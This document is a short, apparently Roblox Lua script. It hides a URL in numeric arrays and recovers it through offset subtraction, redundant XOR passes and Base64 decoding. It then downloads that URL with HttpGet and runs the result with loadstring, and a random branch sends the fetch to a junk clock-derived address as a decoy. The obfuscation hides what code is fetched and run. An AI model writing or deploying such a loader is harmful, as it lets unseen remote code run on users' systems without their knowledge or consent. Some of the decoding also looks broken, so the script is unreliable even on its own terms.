local H=game:GetService("HttpService")
local R=game:GetService("RunService")

local function x(s,k)
    local t={}
    for i=1,#s do
        t[i]=string.char(bit32.bxor(s:byte(i),k))
    end
    return table.concat(t)
end

local p={
    {485,504,493,506,495,504,504,509,470,497,509,504,470,506,500,493},
    {506,502,501,497,506,500,503,507,497,500,503,497,502,509,501,506},
    {504,507,504,509,504,507,504,509,470,501,507,506,470,504,470,504},
    {504,507,507,503,497,502,506,500,470,504,507,506,470,504,507,506},
    {497,511,470,501,497,504,503,511,504,500,503,506,470,504,507,506},
    {506,502,505,470,497,504,507,500,505,504,502,470,504,507,506,504},
    {486,468,468},
    {504,505,470,501,504,505,503,509,497,511,504,505,470,504,507,505}
}

local function u()
    local o={1,2,3,4,5,6,8,7}
    local b={}
    for i=1,#o do
        local a=p[o[i]]
        for j=1,#a do
            b[#b+1]=string.char(a[j]-425)
        end
    end
    local s=table.concat(b)
    local k1=((#s+math.floor(R.RenderStepped:Wait()*1000))%23)+17
    local k2=((tick()%31)//1)+11
    s=x(s,k1); s=x(s,k1)
    s=x(s,k2); s=x(s,k2)
    return H:Base64Decode(s)
end

local function z()
    local t=tostring(os.clock()):reverse()
    local k=(#t%19)+7
    return x(t,k)
end

task.wait((tick()%0.2))
if math.random(1,2048)==1337 then
    loadstring(game:HttpGet(z()))()
else
    loadstring(game:HttpGet(u()))()
end
